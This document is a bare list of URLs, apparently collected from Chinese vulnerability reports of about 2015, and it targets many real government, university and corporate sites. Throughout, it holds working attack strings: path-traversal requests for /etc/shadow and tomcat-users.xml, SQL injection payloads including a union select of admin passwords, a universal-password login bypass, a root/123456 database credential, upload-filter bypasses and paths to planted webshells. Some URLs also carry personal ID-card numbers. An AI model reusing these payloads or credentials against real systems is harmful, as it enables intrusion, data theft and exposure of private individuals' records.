http://www.fjyxt.cn/admin/FCKeditor/editor/fckeditor.html http://122.200.87.195/biportal/verifyLogin http://rb.tcl.com:81/car/login.jsp http://rb.tcl.com:81/car/serviceReg.jsp http://rb.tcl.com:81/car/zcy.jsp http://222.133.40.154/m/index.action http://**.**.**.**/modul/webcon!findTypeLi.action http://www.wangxuankj.com/IndexAction.do http://www.wangxuankj.com/ModifyNewsAction.do?newsID=1 http://60.191.202.167/zjwgyxg/ModifyNewsAction.do?newsID=1 http://www.xyysq.cn/ModifyNewsAction.do?newsID=1 http://wg.hznu.edu.cn/health/ModifyNewsAction.do?newsID=1 http://www.86998866.com:8080/ModifyNewsAction.do?newsID=728 http://shangou.lenovo.com.cn/.DS_Store http://shangou.lenovo.com.cn/login.html.bak http://shangou.lenovo.com.cn/index.zip http://www.jygglglj.com/jygSystem/thirdAction!getThirdList.action http://agent.yongche.com/ http://www.steelsy.com/ecp/announcement/announcement_view2.action inurl:qiye.asp?num= http://www.hzdzdd.cn/qiye.asp?num=72 http://www.yxgtj.net/qiye.asp?num=72 http://gtj.nanzheng.gov.cn/qiye.asp?num=72 http://www.xxgtj.com/qiye.asp?num=72 http://gtj.hzedz.gov.cn/qiye.asp?num=72 http://i.midea.com/ http://61.129.250.80/workorder-web/logout.html http://www.ilas.com.cn/ http://61.136.169.183/NTBookRetrNewBookInfo.aspx?NewBookNum=203333&page=1 http://218.76.255.3:9992/NTBookRetrNewBookInfo.aspx?NewBookNum=%E6%96%87%E5%AD%A6%E4%B9%A6&page=1 http://ilas.helib.net/NTBookRetrNewBookInfo.aspx?page=3&NewBookNum=11 http://211.141.112.39/NTBookRetrNewBookInfo.aspx?NewBookNum=%E5%BB%BA%E5%85%9A90%E5%91%A8%E5%B9%B4%E4%B8%93%E6%A0%8F&page=1 http://lib.wdu.edu.cn:8081/NTBookRetrNewBookInfo.aspx?NewBookNum=2015%E5%B9%B43%E6%9C%88&page=1 http://61.133.142.125:8001/ahCRHouse/index.html http://61.133.142.125:8001/ahCRHouse/tzgg/Detail.action http://www.lyfyw.com/ http://www.lyfyw.com:81/wsyycx/wsyycx/login_toLogin.action dir:D:\tomcat6.0\webapps\wsyycx\ http://mail.fjgdwl.com/pma/ user:root pass:123456 http://www.zjedu.org/tv/cate.php时K存在注射漏洞 http://www.zjedu.org/tv/cate.php http://yeyou.mop.com/payment/yee_mobile.aspx?code= http://xxgk.xxanc.gov.cn/front/main.action http://srm.tclking.com(登录处没有注入) http://srm.tclking.com/vmi/WebService/WS_Login.asmx/jsdebug http://srm.tclking.com/vmi/WebService/WS_Login.asmx http://srm.tclking.com/vmi/WebService/WS_Login.asmx?op=ChangePassWorld http://srm.tclking.com/vmi/WebServic http://www.scipo.gov.cn/ ftp://202.100.221.44/ http://portal.ecjtu.edu.cn/dcp/fileUpload?action=filedownload&fileName=black.png&filePath=uploadfiles/storage/2015/4/2/6f6f70cff21a4e5cbb7168d9da9bdad3.png http://portal.ecjtu.edu.cn/dcp/uploadfiles/storage/2015/4/2/6f6f70cff21a4e5cbb7168d9da9bdad3.png http://portal.ecjtu.edu.cn/dcp/fileUpload?action=filedownload&fileName=passwd&filePath=../../../../../../../../../../../../../../../../../../etc/shadow pinge.focus.cn/a/Follow http://pinge.focus.cn/a/Follow pss.uestc.edu.cn/tasi/admin/system/language.asp pss.uestc.edu.cn/tasi/admin/system/tutordept.asp pss.uestc.edu.cn/tasi/admin/system/subject.asp pss.uestc.edu.cn/tasi/admin/system/usermng.asp ftp://202.108.199.49 http://tools.yahui.cc/ http://www.oaxis.com/product_list.php?id=2 http://helpdesk.sunits.com:8088//jmx-console/ http://helpdesk.sunits.com:8088/invoker/JMXInvokerServlet http://www.wangpansou.cn/s.php?q=edu.cn&wp=0&start=0 http://es.nuist.edu.cn/phpmyadmin/ http://istudy.wanguoschool.net/Default.aspx?islogin=1 http://www.tjdag.gov.cn/tjdag/wwwroot/root/template/main/jgsl/gsfq_article.shtml?id=4641 http://220.181.69.171/ http://220.181.190.215/ http://admin.my.hd.sohu.com/mem_manager/ http://123.125.44.106/ http://123.125.44.106/giveArea http://flfw.smesd.gov.cn/clist.jsp?id=331 http://flfw.smesd.gov.cn/clist.jsp?id=331 http://www.ligchina.com.cn/joinus/joinus010101.asp?id=50 http://mis.998.com/ http://mis.998.co http://hr.ctrl.com.cn/JobDeatil.aspx?id=79 http://hr.ctrl.com.cn/Developing.aspx?id=6 http://hr.ctrl.com.cn/JobHelp.aspx?id=1 http://hr.ctrl.com.cn/News.aspx?id=2 http://hr.ctrl.com.cn/newsMore.aspx?id=19 ftp://202.114.89.64/ http://202.114.89.64:8090/Default.aspx http://www.flcit.com/index.do http://www.xmxaedu.gov.cn/mailbox!mailbox.do?mark=1&schoolCode=001245 http://www.xmxxzx.com/mailbox!mailbox.do?mark=1&schoolCode=001245 http://www.flcit.com/mailbox!mailbox.do?mark=1&schoolCode=001245 http://www.xmxayz.com/mailbox!mailbox.do?mark=1&schoolCode=001245 http://www.jmqsng.com/mailbox!mailbox.do?mark=1&schoolCode=001245 http://www.sn.10086.cn/portalmgr/app?service=page/career.MyApply&listener=queryMyApply http://www.cngrain.org/blm81/index.php http://labour.wuyishan.gov.cn/news.asp?id=222 http://www.jnsi.gov.cn:8009 http://www.santang.com.cn/GcList.aspx?BigClassId=157&SmallClassId=158 http://202.192.18.141/AllInfor/Experiment_baseInfor.aspx?SYXH=1 http://jwmis.hnie.edu.cn/sysgl/AllInfor/Experiment_baseInfor.aspx?SYXH=1 http://58.42.243.135:9100/AllInfor/Experiment_baseInfor.aspx?SYXH=1 http://218.76.140.198:8003/AllInfor/Experiment_baseInfor.aspx?SYXH=1 http://zgp.njutcm.edu.cn/AllInfor/Experiment_baseInfor.aspx?SYXH=1 ftp://202.114.123.53/ http://221.5.88.30:9080/ ftp://202.120.53.237/ http://219.150.39.204 http://www.socket.net.cn/cn/news_detail.aspx?t=106 http://cloud.unicomgd.com:8161/admin/index.jsp cn:8080 ftp://bbs.hynews.net/ ftp://202.120.111.93/ ftp://202.120.119.151/ ftp://202.120.189.61/ ftp://202.120.43.87/ http://www.szahotel.com/admin/addUser.aspx http://www.szahotel.com/admin/szalogin99.aspx http://www.szahotel.com/admin/ http://cloud.unicomgd.com:8002/ http://www.chinasunsoft.net/ http://58.57.166.157:6006/cun/gongkai.aspx?zzdwdm=371522001001&type2=1 http://221.2.207.254:6006/cun/gongkai.aspx?zzdwdm=371501001001&type2=1 http://222.175.5.110:6006/cun/gongkai.aspx?zzdwdm=371523014029&type2=5 http://58.57.165.13:6006/cun/gongkai.aspx?zzdwdm=371524005001&type2=4 http://120.192.75.114:6006/cun/gongkai.aspx?zzdwdm=161508001001&type2=1 http://120.192.75.114:6006/cun/gongkai.aspx?zzdwdm=161508001001&type2=1 http://www.zc511.com/ http://www.zjrrt.com/addProductShoppingCart.do?amount=1&productID=248926 http://www.smdyf.cn/addProductShoppingCart.do?amount=1&productID=148596 http://www.ewj2009.com/addProductShoppingCart.do?amount=1&productID=248926 http://www.46buy.com/addProductShoppingCart.do?amount=1&productID=248926 http://www.hnjbyy.cn/addProductShoppingCart.do?amount=1&productID=248926 http://www.hnlbxdyf.com/addProductShoppingCart.do?amount=1&productID=248926 http://test.gxjjls.com/addProductShoppingCart.do?amount=1&productID=248926 http://test.hzyibai.com/addProductShoppingCart.do?amount=1&productID=248926 http://www.smdyf.cn/addProductShoppingCart.do?amount=1&“productID=148596” http://www.smdyf.cn/addProductShoppingCart.do?amount=1&productID=148596 www.smdyf.cn http://dtsmt.gw.com.cn/bbs/uc_server/admin.php http://beian.ncfdj.gov.cn:8080/pub_buildctrl.aspx?buildcode=14110093753288 http://61.184.26.226:8081/pub_buildctrl.aspx?buildcode=13898568821001 http://218.89.108.173:8080/pub_buildctrl.aspx?buildcode=134665591925025 http://www.ahbzfdc.com:8080/pub_buildctrl.aspx?buildcode=13528637561001 http://www.bzfcj.gov.cn:9090/pub_buildctrl.aspx?buildcode=13100939741001 http://www.bzfcj.gov.cn:9090/pub_buildctrl.aspx?buildcode=13100939741001 http://lar.unicomgd.com/ http://wooyun.org/bugs/wooyun-2015-099087 http://lar.unicomgd.com/WebResource.axd?d=rF9mcFBXRdOs0vsKIxd7PQ2 ftp://**.**.**/_ http://admin.unisk.cn/ http://crm.tianya.cn/ http://www.renrenle.cn/share/download.jsp?filePath=/WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd java:/WEBDS http://ckeditor.com http://java.sun.com/jsp/jstl/core http://java.sun.com/jsp/jstl/fmt http://java.sun.com/jsp/jstl/functions http://java.sun.com/jsp/jstl/sql http://java.sun.com/jsp/jstl/xml http://java.sun.com/jsp/jstl/core_rt http://www.renrenle.cn/share/download.jsp?filePath=/WEB-INF/mail.properties http://duty.wocloud.cn/index.htm http://211.81.174.133:81/dlib/dir.asp?lang=gb&DocID=88609 http://reserve.calis.edu.cn/dlib/dir.asp?lang=gb&DocID=88609 http://dlib.fxlib.cn:8282/dlib/dir.asp?lang=gb&DocID=88609 http://61.167.120.67:8083/DLib/dir.asp?lang=gb&DocID=88609 http://dzts.nsjy.com/dlib/dir.asp?lang=gb&DocID=88609 http://admin.unisk.cn/ad/ http://xxx.xxx.xxx.xxx/xx/xx,username,pas***** https://github.com/cnydpl/Eval/blob/master/Eval/settings.py http://hjedu.dg.gov.cn/printpage.asp?articleid=7808 http://hjedu.dg.gov.cn/Admin_login.asp http://hjedu.dg.gov.cn/printpage.asp?articleid=7 http://hjedu.dg.gov.cn/printpage.asp?articleid=7 https://61.189.156.196 http://www.aqjyw.gov.cn http://www.xmgqzx.com/dms/files!getPickFiles.do http://www.xmxayz.com/dms/files!getPickFiles.do http://www.xmxdzx.com/dms/files!getPickFiles.do http://xmjmzx.xmedu.cn/dms/files!getPickFiles.do http://www.xmblxx.com/dms/files!getPickFiles.do http://hd.tiexue.net http://www.bioknow.net/portal/root/website_bioknow/index.jsp http://www.bioknow.cn/portal/root/lims_std/gyxt.jsp?lmbm=YHXZ http://211.69.141.135/portal/root/lims_std/gyxt.jsp?lmbm=YHXZ http://202.38.77.223:8000/portal/root/lims_std/gyxt.jsp?lmbm=YHXZ http://venus.ipc.pku.edu.cn/portal/root/lims_std/gyxt.jsp?lmbm=YHXZ http://molpharm.jiangnan.edu.cn/portal/root/lims_std/gyxt.jsp?lmbm=YHXZ ftp://202.202.111.188/ http://www.flcit.com/ http://www.xmxdzx.com/morelist!morelist.do?keytype=1&actdo=search&btnSubmit=123&keywords= http://www.xmyfzx.com/morelist!morelist.do?keytype=1&actdo=search&btnSubmit=123&keywords= http://www.sssmfx.com/morelist!morelist.do?keytype=1&actdo=search&btnSubmit=123&keywords= http://hqzx.smjy.net/morelist!morelist.do?keytype=1&actdo=search&btnSubmit=123&keywords= http://jydd.xmhcedu.gov.cn/morelist!morelist.do?keytype=1&actdo=search&btnSubmit=123&keywords= http://123.147.162.12:8088/neon_admin/admin/index.htm http://221.5.243.13:8088/neon_admin/admin/index.htm ftp://**.**.** http://shop.ali213.com//my/orderDetail.html?id=175558 http://shop.ali213.com//my/orderDetail.html?id=175500%20and%201=1 http://shop.ali213.com//my/orderDetail.html?id=175500%20and%201=2 http://shop.ali213.com//my/orderDetail.html?id=175500%20order%20by%2024 http://shop.ali213.com//my/orderDetail.html?id=175500%20order%20by%2025 ftp://**.**.** inurl:cpzs.asp?ProClass= http://www.sinojm.com/ http://www.sqyqmy.com/ http://www.njpinan.com/ http://www.sdlnjs.com/ http://www.njzjn.com/ http://www.jshlzd.com/ http://www.wgjjw.com/ http://www.chetjs.com/ http://www.sqwpwy.com/ http://www.jssgjy.cn/ http://njmayi-bj.com/ http://www.njxmj.com/ http://jswdzs.com/ http://www.njrhlqkj.com/ http://www.njhpzkb.com/ http://njxiangyu.com/ http://www.hahjzs.com/ http://www.yhwxjy.cn/ http://www.njyll.cn/ http://www.xinfeng168.net/ http://pub.px.gw.com.cn/training/download.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../etc/passwd&name=c http://pub.px.gw.com.cn/training/down.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../etc/passwd&name=c http://pub.px.gw.com.cn/training/download.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../opt/apache-tomcat-7.0.8/tomcat-users.xml&name=c http://pub.px.gw.com.cn/training/download.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0&name=c ftp://gxda.gxi.gov.cn/ www.sxbus.com http://push.my.tv.sohu.com/user/a/fo/batchadd.do?uids=201277014&passport=mailingtesting@163.com http://push.my.tv.sohu.com/user/a/fo/batchadd.do?uids=201277014&passport=mailingtesting@163.com,passport为用户的邮箱,搜狐用户的tv用户量还是较大的,随意搜索一些,即可为自己的视频增加订阅量了 http://admin.swxqzs.nsjy.com/login.action http://115.182.12.81/toLogin http://admin.ha.cc/ http://game.letv.com http://emzyxw.njfu.edu.cn存在注入漏洞,用sqlmap可直接拿到管理员帐号密码 http://jsedu.njfu.edu.cn后台登陆绕过语句万能密码1'or'1'='1,真没想到学校的站也能这样 http://jg.njfu.edu.cn弱口令admin job.sicau.edu.cn/tz.php https://github.com/yuekaizong/yzrcm/blob/9245c6c1b05bd79ef7d379524d112a9a6a4c4ec5/%E7%9B%B8%E5%85%B3/%E5%88%86%E4%BA%AB.txt http://www.96877.sh.cn/admin/login.htm http://www.xinyour.net/ http://www.xinyour.com/About-3.html http://manage.xinyour.com/ http://101.227.20.240/report/view/2/ http://101.227.20.240/report/pass/1/ http://xxx.xxx http://xxx.xxx http://xxx.xxx http://202.108.98.98//pcheck.asp http://117.79.228.14/user/index/User_page/ http://61.154.9.9:8009/ http://www.tbmmis.com/Login.aspx http://tg.gw.com.cn/tzzgx/admin/login.php” http://tg.gw.com.cn/tzzgx/admin/add.php http://tg.gw.com.cn/tzzgx/admin/add.php?id=368 http://tg.gw.com.cn/tzzgx/admin/upload/ http://tg.gw.com.cn/tzzgx/admin/upload/150406093742.php http://www.qhdksy.cn/flm/flm_xx.php?fid=162 http://beian.ocn.net.cn/ http://ipi.tongji.edu.cn/admin/mod/default/index.php http://www.yiqibian.com/index.php?m=member&c=index&a=public_college_password_mobile http://www.yiqibian.com/index.php?m=member&c=index&a=public_college_password_mobile&step=2 http://www.sobeycollege.com/ http://www.yiqibian.com/ http://csearch.cloudtv.ocn.net.cn/login.action http://bmxt.mca.gov.cn/scheck.asp http://bmxt.mca.gov.cn/pcheck.asp http://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&tn=baidu&wd=第二步%3A将第一步复制出来的订单号粘贴到下方淘宝订单号中%2C网站会员帐号和密码为您&rsv_pq=9dae0f700004cf1d&rsv_t=2dc85x7kS%2Bac%2BlIRiBfX8DvDlyFN9rQl%2FaXaUmeDBy%2BKshQBhH3FrjK%2BsJw&rsv_enter=0&inputT=577&rsv_n=2&rsv_sug4=577 http://www.qibasan.com/taobao/ http://msf.cq119.gov.cn:8083/cqcms/index.jsp http://125.70.242.237:81/qdsp/ www.boojob.com www.hr800.cn www.gaojob.com这个也是捷通人才系统 www.rcsc.com这个也是捷通人才系统 cn:8080 http://video.gw.com.cn/voideservlet?timestamp=1428290659451 http://www.day900.com/ http://www.qysi.gov.cn/websys/jsp/website/emailbox/emailbox_more.jsp?org_id=001 http://qysi.gov.cn/websys/jsp/website/common/pub_view.jsp?org_id=001&SDIR_CODE=200609280000000112&SFILE_ID=201503170000002801 http://dts.gw.com.cn/outlets.php http://220.170.145.173:8879/bookingHosClient/logoutAction.action http://220.191.211.161/login/login.do http://www.ngfgj.cn:8001/user/login.action http://wooyun.org/bugs/wooyun-2015-0103532 http://www.czfc.org.cn/news/news_show.asp?news_id=897 http://www.czfc.org.cn/kjcx_view.asp?h_key=true&nytypeid=ny36x7 http://www.czfc.org.cn/gift_search.asp?pagen=2&startD=&endD=&qh=&giftNumber=&action=search&type=%27%C4%CF%D4%C1%B7%E7%B2%CA36%D1%A17%27%2C+%27%BA%C3%B2%CA36%27%2C+%27%C4%CF%D4%C1%B7%E7%B2%CA26%D1%A15%27%2C+%27%BA%C3%B2%CA26%27%2C+%27%CB%AB%C9%AB%C7%F2%27%2C+%27%B8%A3%B2%CA3D%27 http://www.czfc.org.cn/kjnum_36x7_mx.asp?krs=2015085 http://www.czfc.org.cn/txxw_contact2.asp?ProductID=2195 http://www.crmshwlzx.com/jiajia/news_Show_user.asp?ID=709 http://www.crmstjc.com.cn/news_Show_user.asp?ID=931 http://www.crmsyc.com.cn/news_Show_user.asp?ID=1939 http://www.crm-xa.com/news_Show_user.asp?ID=759 http://www.ztyh.com.cn/news_Show_user.asp?ID=1656 http://www.jggw.suzhou.gov.cn/BLS/IndexList.aspx?type=QuestionsType_3 http://www.jggw.suzhou.gov.cn/lecture/lecture_detail.aspx?lectureId=22 http://www.szbb.suzhou.gov.cn/root.rar http://www.szbb.suzhou.gov.cn/jgsz.php?class_id=53&top=&Type_id=61 http://www.sjhlcs.com/admin/manage.asp无需登录即可操作 http://www.sjhlcs.com/admin/editer/UpPic.asp无需权限即可上传 http://zhidao.baidu.com/ihome ftp://bbs.hynews.net/ http://www.fecb.com.cn http://pk.baofen.ali213.net/login?id=51 http://life.imnu.edu.cn http://agriplan.njau.edu.cn http://www.sdtz.sdu.edu.cn http://www.wangpiao.com http://xxqn.ujn.edu.cn http://www.dfzq.com.cn/dfzq.tar.gz http://admin.xgo.com.cn/admincp.php?action=content_edit&documentid=1163854&ord=1427824013 http://www.day900.com/ http://a1.greentree.cn:8098/Service.asmx http://my.39.net//ashx/MyQuestion.ashx?QuesType=QuestionList&TagName=%25B8%25DF%25D1%25AA%25D1%25B9 http://haijun.xaut.edu.cn www.yiban.cn http://jurist.whu.edu.cn http://stat.ruc.edu.cn/ inurl:article.php?m= http://case.xmu.edu.cn/article.php?m=1 http://www.hengren.com/article.php?m=5 http://www.yl-photo.com/article.php?m=9 http://www.dazuixing.com/article.php?m=1 http://www.netcontrol.com.cn/article.php?m=15 http://sj10.xm12t.com.cn/article.php?m=19 http://www.xmeczy.com/article.php?m=8 http://www.pinmaidao.cn/article.php?m=1 http://xmtbao1.xm55.host.35.com/article.php?m=5 http://sj18.xm12t.com.cn/article.php?m=19 http://xmirjd.com/article.php?m=5 http://sinoleading.com.cn/article.php?m=1 http://xmzqit.cn/article.php?m=10 http://hysmwh.com/article.php?m=9 http://www.xmmeiwangda.com/article.php?m=1 http://www.xmcue.com/article.php?m=5 http://xiamenyuhui.com/article.php?m=1 http://xmgjd.com/article.php?m=7 http://fjyqjx.com/article.php?m=1 http://www.lhcoving.com/article.php?m=1 http://www.5047438.com/article.php?m=12 http://www.jscnnet.com/ http://www.wooyun.org/bugs/wooyun-2014-065194/ http://www.jscnnet.com//DesktopModules/C_Info/WebService/C_InfoService.asmx?op=GetArticleHitsArray www.jscnnet.com http://tempuri.org/GetArticleHitsArray soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope inurl:newsinfo.aspx?columntitle= http://121.30.251.3:85/portal/xzsp3/newsinfo.aspx?columntitle=%E4%B8%AD%E5%BF%83%E7%AE%80%E4%BB%8B http://60.220.253.153:81/portal/xzsp_zhangzi/newsinfo.aspx?columntitle=%E5%AE%A1%E6%94%B9%E5%8A%A8%E6%80%81 http://www.gjzwzx.cn/portal/xzsp3/newsinfo.aspx?columntitle=%E4%B8%AD%E5%BF%83%E5%8A%A8%E6%80%81 http://www.hdxzwzx.com/portal/xzsp_handanxian1/newsinfo.aspx?columntitle=%E4%B8%AD%E5%BF%83%E5%8A%A8%E6%80%81 http://211.142.37.152:85/portal/xzsp3/newsinfo.aspx?columntitle=%E4%B8%AD%E5%BF%83%E5%8A%A8%E6%80%81 http://www.bdxzfw.cn/portal/xzsp/newsinfo.aspx?columntitle=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81 demo:http://show.wecrm.com/xt/main http://www.ecjtu.edu.cn/ http://www.suqianlawyer.com///syWebEditor/Sel_UploadFile.asp http://www.suqianlawyer.com/syWebEditor/Sel_UploadFile.asp?obj=AdvUrl&fileType=gif|jpg|asp;.jpg|&filePathType=1&filePath=/syWebEditor/UploadFile/ http://www.suqianlawyer.com/syWebEditor/UploadFile/QQ图片20150406185040.asp.jpg http://www.suqianlawyer.com/syWebEditor/Sel_UploadFile.asp?obj=AdvUrl&fileType=gif|jpg|.;asp|&filePathType=1&filePath=/syWebEditor/UploadFile/ http://www.suqianlawyer.com//syWebEditor/UploadFile/1.asp http://www.zhubian88.cn/syWebEditor/UploadFile/1.asp http://www.suqianlawyer.com//syWebEditor/UploadFile/1.asp http://www.haomiaoyz.com/syWebEditor/UploadFile/1.asp http://www.w8118w.cn/syWebEditor/UploadFile/1.asp http://jiansh101.view.rrhjz.org/main/DownLoad.asp?sType=DownFile&FileName=/Web.config http://i.yeepay.com/shtml/success.shtml?agentCode=Agent00002286R&mobileNo=15285004012&realAmount=30.15&requestId=ONLINE10006916690&returnInfo=000000&subValue=30.0 http://218.78.241.80/anmai/KY_Mamage/Integrate_Select/OutlayEarning_Select_particular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Integrate_Select/OutlayEarning_Select_particular.aspx?id=1 http://www.gxbyzx.cn:88/anmai/KY_Mamage/Integrate_Select/OutlayEarning_Select_particular.aspx?id=1 http://oa.w12z.com/anmai/KY_Mamage/Integrate_Select/OutlayEarning_Select_particular.aspx?id=1 http://www.xwgjzx.com:8888/anmai/KY_Mamage/Integrate_Select/OutlayEarning_Select_particular.aspx?id=1 http://asp.39.net/User/Login inurl:http://gzb.gcp.glodon.com/view.do?&pagestate= http://app.uc.cn/appstore/AppCenter/api/activate_uc?uc_param_str=nieidnutssvebipfcp&src=uc_video&dest_url=ext:uc_dw:http://addondl.uc.cn/resources/pkg/thunder.apk http://dts.gw.com.cn/newslist.php http://mo.gw.com.cn/test.php[没爆破成功 inurl:RESOURCE/kindcontent http://www.yuysoft.com/index.asp http://liuyang.ccgp-hunan.gov.cn/newsAction!getMap.action http://ntzx.cn/data/backup/VICWOR~2.SQL http://v.wxxscm.com.cn/data/backup/VICWOR~2.SQL http://vod.czgd.cn/data/backup/VICWOR~1.SQL http://218.7.16.70/data/backup/VICWOR~1.SQL http://v.lhjy.net/data/backup/VICWOR~1.SQL http://www.wyzc.com/index.php?a=career&m=User&c=setUserInfo http://www.wyzc.com/index.php?a=order&m=Payment&c=finish&order_id=2175 http://202.127.45.72/ http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://my.shushi100.com/popajax/disput.aspx?action= http://www.cits.cn/member/getbackpasswd.html?sendTime=MjAxNS0wNC0wNyAxMjozOQ==&userValue=Ynl6aGl3ZW5AdmlwLnFxLmNvbQ==&userType=ZW1haWw=&submitType=emailResetpws http://www.cits.cn/member/getbackpasswd.html?sendTime=MjAxNS0wNC0wNyAxMjozOQ==&userValue=dGVzdEBjaXRzLmNvbS5jbg==&userType=ZW1haWw=&submitType=emailResetpws http://www.cits.cn/member/getbackpasswd.html?sendTime=MjAxNS0wNC0wNyAxMjozOQ==&userValue=MjM1NDE5MDAxNEBxcS5jb20=&userType=ZW1haWw=&submitType=emailResetpws http://www.cits.cn/regist.html?sessionID=&sendTime=MjAxNS0wNC0wNyAxMjo1Ng==&email=d29veXVuQGNpdHMuY24=&password=Y2VzaGkxMjM=&mode=emailUser http://202.102.116.145/gyspt/framework/login!logout.action http://kaku.51credit.com/tag/index.html http://jwxt.tzpc.edu.cn/default.asp http://jwgl.jhu.cn/default.asp http://222.187.199.60/default.asp http://jwc.jljtxy.com.cn/default.asp http://211.70.120.101/default.asp http://jcjx.nuaa.edu.cn/kaoshi/ http://221.226.83.60:8081/default.asp http://61.133.99.99/admin/login.php http://ecp.weaver.com.cn/user/user!login.action http://ecp.weaver.com.cn/wechatapi.war http://ecp.weaver.com.cn/wechatapi/.svn/entries http://ecp.weaver.com.cn/12345.txt http://ecp.weaver.com.cn/12345.jsp http://ecp.weaver.com.cn/job.jsp http://ecp.weaver.com.cn/mytesttest.jsp http://ecp.weaver.com.cn/shell.jsp http://pm.51iwifi.com http://admin.mori.ifeng.com/Home/Index title:PHPEMS无纸化模拟考试系统 http://pr.alexa.cn/index.php?url=t.cc%20%27%20and%20extractvalue%281,%20concat%280x5c,%20%28select%20@@version%29%29%29%20or%20%27a%27=%27a http://union.ucweb.com/manager.php?m=Member&c=Account&a=login http://114.0437.com/xiaoxie/content/content.php?id=1121%20and%20sleep%2810%29 http://www.baoxian.com/console/shop/order_config_new!linkOrderDetails.action?orderSn=20140000000001 http://www.1337day.com/exploit/23480 http://mdl.shsmu.edu.cn/zh/home.jsp http://paper.medlive.cn/ http://paper.medlive.cn/literature/3957 http://paper.medlive.cn/literature/edit/3957 http://**.**.**/ http://sie.cuc.edu.cn/showleftenglish.php?ID=131 http://dzh.com.cn/admin/userlist.php http://dzh.com.cn/admin/editUser.php?username=test110%27%20and%201=2%20union%20select%201,username,3,password,5%20from%20user%20where%20username=%27admin%27--+ http://mo.gw.com.cn/解析的,后面可能因为修补“漏洞”后面换地方了。 https://github.com/qzn928/azurebreeze/blob/524389a30f2166a0a41df8c13dd1849166b4387f/azurebreeze/center/view/ssh_view.py https://github.com/qzn928/treasureBox/blob/ce08feddfc939191013757fa59000ba56f9a11d5/api.out https://github.com/qzn928/treasureBox/blob/a0ab816f8e407841a0a010f5f32b91218c82ea74/diskcheck.py https://github.com/qzn928/pay_mailer/blob/ca8be007415e5d09d3de03ecf26259f741056192/pay_mailer/local_settings.py http://home.bokecc.com http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=2801014476254&id=53010219880612372x&ctype=01&md5sign=d6fa35ead16f0493c1c1ab3a525dd418 http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=2807111974873&id=422626196302170229&ctype=01&md5sign=7e8067e0ae6f83d074427c0fc0b9314b http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=2816015503400&id=533525197612081220&ctype=01&md5sign=6a6a7fa5ce640aa197150e51e78ab4b3 http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=2816014194518&ctype=01&md5sign=b17dc783a45e282c0fe9786a9140db0f&md5s=123 http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=28040117881379&id=441900200603030873&ctype=01&md5sign=77c86b5898cea35bfee4a5e682e9a754 http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=28010111649884&id=220802198111191828&ctype=01&md5sign=e243cc5fd2f50dd5363dd19b12359423 http://42.99.33.26/MSS-PORTAL/ http://42.99.33.26/MSS-PORTAL/news/edit.do?id=20019 http://42.99.33.26/MSS-PORTAL/clearifynotice/edit.do?id=9200 http://xue.kekenet.com/index.php/search.html?word=1 http://tvoa.ijntv.cn:8057/hrss/login.jsp http://tvoa.ijntv.cn:8057/hrss/dorado/smartweb2.RPC.d?__rpc=true www.gnhz.sdu.edu.cn/about.php?id=7 http://localhost/test/iwebshop/index.php?controller=system&action=admin_repwd http://localhost/test/iwebshop/index.php?controller=system&action=admin_repwd_act http://localhost/test/iwebshop/index.php?controller=system&action=admin_repwd http://222.73.219.188:302/yydt/yydt-detel.asp?newsid=1261&leibieid=1 http://www.hkcts.com/CMS/news/search.action?ftl=/../../web.xml&catId=&keyword=3 https://ibsbjstar.ccb.com.cn/app/V5/CN/STY1/F100701.jsp?UKEYSERIALNUM= http://117.25.128.177:60010/data_report/login.do http://class.medlive.cn/ http://www.ydcard.com http://news.medlive.cn/all/info-news/show-76742_97.html http://www.globaltraveler.com.cn/存在数据库泄漏,可获取管理员密码。 http://www.jxdz.uestc.edu.cn/index.php/admin http://www.jdwy.zhaoyuan.gov.cn/admin/uploadfile.asp http://61.154.14.93:8080 http://61.154.14.93:8080/FCKeditor/editor/fckeditor.html http://61.154.14.93:8080/userfiles/file/33.asp http://219.235.86.81:8080/ http://www.tyut.edu.cn/gongqingtuan/news/info_show.asp?id=107&bigid=3&smallid=11 http://xm.bjnw.gov.cn/jmx-console/ http://english.sino-agri.com/show.php?id=10 http://www.fmyh.com.cn/shownews.asp?id=572 http://www.fmyh.com.cn/admin/ http://www.xmbtn.com/pay/index.html http://www.gzkyz.com.cn/MessageWrite.asp http://web.sh.ptt.189.cn/company/webapps/pages/ shell:http://web.sh.ptt.189.cn/company/webapps/pages/img.jsp http://info.xinhua.org/pubdkh/HNNY/login.htm http://map.srcb.com:8055/srcbGisPort/district/districtJson.do www.isunwifi.com http://www.isunwifi.com:81 http://m.zol.com.cn//topic/mwc/ajax/more.php?id=3083&page=2 http://117.27.135.247/login.aspx www.ordosgajj.gov.cn/index.aspx http://www.ordosgajj.gov.cn/news_details.aspx?ID=2153 http://www.ordosgajj.gov.cn/news_details.aspx?ID http://sqlmap.org http://pms.suning.com.cn/ http://www.letvcloud.com/stats/userinfo?userid=101111 http://**.**.**/main.aspx http://www.ed12345.com/product_detail.php?id=565 http://www.ed12345.com/news_list.php?class_id=50 http://www.ed12345.com/home.php?id=203 http://www.ed12345.com/product_detail2.php?member_id=203&id=629 http://newlds-test.h3c.com/lds/sys_login.do http://cscrm.obc.tcl.com/DHome/Login.aspx http://www.citytalk.tw/bbs/forum.php?mod=viewthread&tid=52824&pid=1932775&page=1&extra=#pid1932775 http://express.4px.com/article/category/id/2/cid/13 